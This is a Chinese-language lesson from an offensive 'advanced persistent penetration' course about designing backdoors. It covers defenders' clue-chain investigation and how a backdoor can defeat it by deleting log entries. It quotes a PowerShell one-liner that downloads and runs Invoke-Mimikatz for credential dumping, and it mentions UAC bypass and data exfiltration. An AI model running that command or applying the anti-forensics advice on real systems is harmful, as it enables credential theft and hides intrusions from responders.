- 1-10課
- 11-20課
- 31-40課
- 41-50課
- 51-60課
- 61-70課
- 71-80課
第五十九課:高級持續(xù)滲透-第三季關于后門補充二
專注APT攻擊與防御
https://micropoor.blogspot.com/
前者的話:從第三季開始引入段子,讓本枯燥的學術文章,也變得生動有趣,。
第二季的Demo遵循人性五條來設計,回憶這其中五條:
1:攻擊方與防御方的本質是什么?
增加對方的時間成本,人力成本,資源成本(不限制于服務器資源),金錢成本,。
2:安全公司的本質是什么?
盈利,最小投入,最大產出。
3:安全公司產品的本質是什么?
能適應大部分客戶,適應市場化,并且適應大部分機器,。(包括不限制于資源緊張,寬帶不足等問題的客戶)
4:安全人員的本質是什么?
賺錢,養(yǎng)家,。買房,還房貸。導致,快速解決客戶問題(無論暫時還是永久性解決),以免投訴,。
5:對接客戶的本質是什么?
對接客戶也是某公司內安全工作的一員,與概念4相同,。
6:線索排查與反線索排查
那么這個demo離可高級可持續(xù)性滲透后門還有一段距離,這里引入第六條“線索排查”與“反線索排查”,在第二季的demo中,它生成了一個名為micropoor.txt的文件,如果經(jīng)驗豐富的安全人員可根據(jù)時間差來排查日記,demo的工作流程大致是這樣的,打開notepad++,生成micropoor.txt,寫入內容,關閉文件流。根據(jù)線索排查,定位到notepad++,導致權限失控,。
在線索排查概念中,這里要引入“ABC”類線索關聯(lián)排查,當防御者在得到線索A,順藤到B,最后排查到目標文件C,根據(jù)五條中的第一條,demo要考慮如何刪除指定日志內容,以及其他操作,。來阻止ABC類線索關聯(lián)排查。不要思維固死在這是一個nontepad++后門的文章,它是一個面向類后門,面向的是可掌握源碼編譯的類后門,。同樣不要把思維固定死在demo中的例子,針對不同版本的NT系統(tǒng),完全引用“powershell IEX (New-Object
System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-
Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz”而關于bypass UAC,已經(jīng)有成熟的源碼,。或發(fā)送至遠程或是寫在
本地的圖片里,不要讓知識,限制了后門的想象,。這也正是第一季所說的:一個優(yōu)秀的Microdoor是量身目標制定且一般不具備通用性的,。是的,一般不具備通用性。
觀看目前文章的一共有2類人,一類攻擊方,一類防守方,。假設一個場景,現(xiàn)在擺在你面前有一臺筆記本,并且這臺筆記本有明確的后門,你的任務,排查后門,。我想所有人都會排查注冊表,服務,端口,進程等。因為這些具備通用性,也同樣具備通用性排查手段,。臨近文章結尾,第三次引用:在后門的進化對抗中,rootkit也發(fā)生了變化,最大的改變是它的系統(tǒng)層次結構發(fā)生了變化,。如果徹底理解了這段話,。那么就要引用王健X爸爸的一句話:先定個小目標,控它個1825天。
/*
段子
*/
奈何廠商不重視后滲透攻擊與持久性攻擊,文章的結尾引用馬X爸爸的一句話:
廠商不改變,我們就改變廠商,。
Micropoor
?
問答
其他問答
暫無記錄
筆記
{{ item.create_date_fmt }}
{{item.is_public == 1 ?"已公開":"未公開"}}
筆記審核中
收起
刪除
編輯
{{ item.likes }}
{{ item.likes }}
采集
已采集
資料下載
暫無記錄
作業(yè)
暫無記錄
